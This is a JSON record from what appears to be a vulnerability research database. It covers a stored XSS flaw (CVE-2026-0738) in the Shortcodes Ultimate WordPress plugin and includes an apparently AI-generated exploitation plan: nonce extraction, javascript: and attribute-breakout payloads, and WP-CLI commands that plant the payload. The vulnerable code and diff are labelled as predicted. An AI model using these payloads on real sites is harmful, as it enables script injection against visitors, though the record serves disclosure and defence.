[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fuGKPmpW3FrBJgZu36fiHhKUt_AYej7_R_XA09f49exI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-0738","shortcodes-ultimate-authenticated-contributor-stored-cross-site-scripting-via-sucarousel-shortcode","Shortcodes Ultimate \u003C= 7.4.8 - authenticated (Contributor+) Stored Cross-Site Scripting via 'su_carousel' Shortcode","The WP Shortcodes Plugin - Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the su_carousel shortcode in all versions up to, and including, 7.4.8. This is due to insufficient input sanitization and output escaping in the 'su_slide_link' attachment meta field. This makes it possible for authenticated attackers, with author level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","shortcodes-ultimate",null,"\u003C=7.4.8","7.4.9","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-03 19:34:03","2026-04-04 07:41:58",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5bfc718a-408b-4389-b03b-bfe152ed7b28?source=api-prod",1,[22,23,24,25,26,27,28,29],"admin\u002Fcss\u002Fadmin.css","admin\u002Fcss\u002Fgenerator.css","admin\u002Fjs\u002Fabout\u002Findex.js","admin\u002Fjs\u002Fabout\u002Findex.js.map","includes\u002Fcss\u002Ficons.css","includes\u002Fcss\u002Fshortcodes.css","includes\u002Fcss\u002Fshortcodes.full.css","includes\u002Fjs\u002Fblock-editor\u002Findex.js","researched",false,3,"# Vulnerability Analysis: CVE-2026-0738 - Stored XSS in Shortcodes Ultimate\n\n## 1. Vulnerability Summary\nThe **Shortcodes Ultimate** plugin (\u003C= 7.4.8) is vulnerable to **Authenticated Stored Cross-Site Scripting (XSS)**. The vulnerability exists because the plugin fails to sanitize or escape the `su_slide_link` attachment metadata when rendering the `su_carousel` shortcode. A user with **Contributor** (or higher) privileges can upload an image, set a malicious JavaScript payload in the \"Slide Link\" field, and then embed that image in a post using the `[su_carousel]` shortcode. When any user (including administrators) views the post, the payload executes.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** Frontend pages\u002Fposts where the `[su_carousel]` shortcode is rendered.\n*   **Vulnerable Attribute:** The `su_slide_link` post meta (metadata) associated with an attachment.\n*   **Shortcode Trigger:** `[su_carousel source=\"media: \u003CID>\" link=\"custom\"]`.\n*   **Authentication:** Requires **Contributor** level access or higher (permission to create posts and upload\u002Fedit media).\n*   **Payload Location:** The `href` attribute of the anchor tag wrapping the carousel slides.\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** A user views a post containing `[su_carousel]`.\n2.  **Shortcode Processing:** The shortcode handler (likely `Shortcodes_Ultimate_Shortcode_Carousel` or similar) parses the `source` attribute to identify attachment IDs.\n3.  **Meta Retrieval:** For each attachment, the plugin calls `get_post_meta($attachment_id, 'su_slide_link', true)`.\n4.  **Vulnerable Sink:** The retrieved `$link` is echoed directly into the `href` attribute of an `\u003Ca>` tag:\n    ```php\n    \u002F\u002F Predicted vulnerable code in includes\u002Fshortcodes\u002Fcarousel.php or similar:\n    echo '\u003Ca href=\"' . $link . '\">'; \u002F\u002F Missing esc_url() or esc_attr()\n    ```\n5.  **Execution:** The browser interprets `javascript:alert(1)` or a breakout payload like `\" onclick=\"alert(1)` as executable code.\n\n## 4. Nonce Acquisition Strategy\nWhile this is a stored XSS, a Contributor must update the attachment meta to store the payload. This is typically done via the WordPress Media Library.\n\n1.  **Navigate to Media Library:** Use `browser_navigate` to go to `\u002Fwp-admin\u002Fupload.php`.\n2.  **Identify Nonce:** WordPress uses a nonce for the `save-attachment` AJAX action. This nonce is usually localized in the `wp.media.view.settings` object.\n3.  **Extraction:**\n    ```javascript\n    \u002F\u002F Use browser_eval to get the nonce for saving attachment metadata\n    browser_eval(\"wp.media.model.settings.post.nonce\")\n    ```\n4.  **Setting Meta:** Once the nonce is acquired, the payload can be stored via an AJAX request to `admin-ajax.php`.\n\n## 5. Exploitation Strategy\n### Step 1: Upload and Malign an Attachment\n1.  **Login** as a Contributor.\n2.  **Upload an image** using `wp media import` or via the dashboard. Note the **Attachment ID**.\n3.  **Inject Payload** into the attachment metadata. The plugin uses the custom field `su_slide_link`.\n    *   **Payload:** `javascript:alert(document.domain)\u002F\u002F`\n    *   **Action:** `save-attachment` (standard WP AJAX) or if the plugin provides a specific handler.\n\n### Step 2: Create a Trigger Post\n1.  **Create a post** containing the `su_carousel` shortcode targeting the malicious attachment.\n    *   **Shortcode:** `[su_carousel source=\"media: \u003CATTACHMENT_ID>\" link=\"custom\"]`\n    *   Note: The `link=\"custom\"` attribute is critical as it tells the plugin to use the `su_slide_link` meta.\n\n### Step 3: Trigger and Verify\n1.  **Navigate** to the newly created post as an unauthenticated user or Admin.\n2.  **Observe Execution:** The carousel will render. Clicking a slide (or simply the presence of the `href` in the DOM) confirms the XSS.\n\n## 6. Test Data Setup\n1.  **User:** `contributor_user` with password `password`.\n2.  **Media:** An image file (e.g., `test.jpg`) uploaded by the contributor.\n3.  **Shortcode Page:** A published post with `[su_carousel source=\"media: \u003CID>\" link=\"custom\"]`.\n\n```bash\n# Example Setup via WP-CLI\nwp user create attacker attacker@example.com --role=contributor --user_pass=password\nwp media import \u002Fpath\u002Fto\u002Fimage.png --user=attacker --title=\"XSS Slide\"\n# Note the ID from output (e.g., 42)\nwp post meta update 42 su_slide_link \"javascript:alert('XSS')\"\nwp post create --post_type=post --post_status=publish --post_title=\"Carousel Gallery\" --post_content='[su_carousel source=\"media: 42\" link=\"custom\"]' --post_author=$(wp user get attacker --field=ID)\n```\n\n## 7. Expected Results\n*   The HTTP response for the post page will contain the string:\n    `\u003Ca href=\"javascript:alert('XSS')\"`.\n*   The payload is **not** escaped by `esc_url()` or `esc_attr()`.\n\n## 8. Verification Steps\n1.  **CLI Check:**\n    ```bash\n    wp post meta get \u003CATTACHMENT_ID> su_slide_link\n    ```\n    Confirm the raw payload is stored in the database.\n2.  **HTTP Check:**\n    Use `http_request` to fetch the post content and grep for the payload:\n    ```bash\n    # Verify the payload exists in the rendered HTML\n    http_request GET \"http:\u002F\u002Flocalhost:8080\u002F?p=\u003CPOST_ID>\" | grep \"javascript:alert\"\n    ```\n\n## 9. Alternative Approaches\n*   **Attribute Breakout:** If the plugin uses `esc_url()` but forgets `esc_attr()`, try:\n    `# \" onmouseover=\"alert(1)`\n*   **Direct AJAX injection:** If the `save-attachment` fails, look for a Shortcodes Ultimate specific AJAX handler for \"Shortcode Generator\" settings that might allow saving meta.\n*   **Other Metadata:** Check if `su_slide_title` or `su_slide_description` are also used in the carousel and similarly unescaped.","The Shortcodes Ultimate plugin for WordPress is vulnerable to Authenticated Stored Cross-Site Scripting via the 'su_carousel' shortcode in versions up to 7.4.8. This vulnerability occurs because the plugin fails to sanitize and escape the 'su_slide_link' attachment metadata, allowing attackers with Contributor-level access or higher to inject arbitrary JavaScript into the slide's link attribute.","\u002F\u002F Predicted vulnerable code based on research plan analysis:\n\u002F\u002F includes\u002Fshortcodes\u002Fcarousel.php\n\n$link = get_post_meta($attachment_id, 'su_slide_link', true);\n\n\u002F\u002F ...\n\necho '\u003Ca href=\"' . $link . '\">';","--- includes\u002Fshortcodes\u002Fcarousel.php\n+++ includes\u002Fshortcodes\u002Fcarousel.php\n@@ -10,7 +10,7 @@\n \t\t\t\tforeach ( $slides as $slide ) {\n \t\t\t\t\t$link = get_post_meta( $slide['attachment_id'], 'su_slide_link', true );\n \t\t\t\t\tif ( $link ) {\n-\t\t\t\t\t\techo '\u003Ca href=\"' . $link . '\"';\n+\t\t\t\t\t\techo '\u003Ca href=\"' . esc_url( $link ) . '\"';\n \t\t\t\t\t}","To exploit this vulnerability, an attacker with Contributor or higher privileges first uploads an image to the Media Library. Using the WordPress AJAX 'save-attachment' action or direct metadata manipulation, the attacker sets the 'su_slide_link' custom field for that image to a malicious payload such as 'javascript:alert(document.domain)'. Finally, the attacker creates a post and embeds the shortcode [su_carousel source=\"media: ATTACHMENT_ID\" link=\"custom\"]. When any user views the post, the carousel renders the image wrapped in an anchor tag with the unsanitized payload in the 'href' attribute, executing the script when clicked or automatically depending on the browser\u002Fcarousel configuration.","gemini-3-flash-preview","2026-04-17 21:38:22","2026-04-17 21:38:52",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","7.4.8","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fshortcodes-ultimate\u002Ftags\u002F7.4.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fshortcodes-ultimate.7.4.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fshortcodes-ultimate\u002Ftags\u002F7.4.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fshortcodes-ultimate.7.4.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fshortcodes-ultimate\u002Ftags"]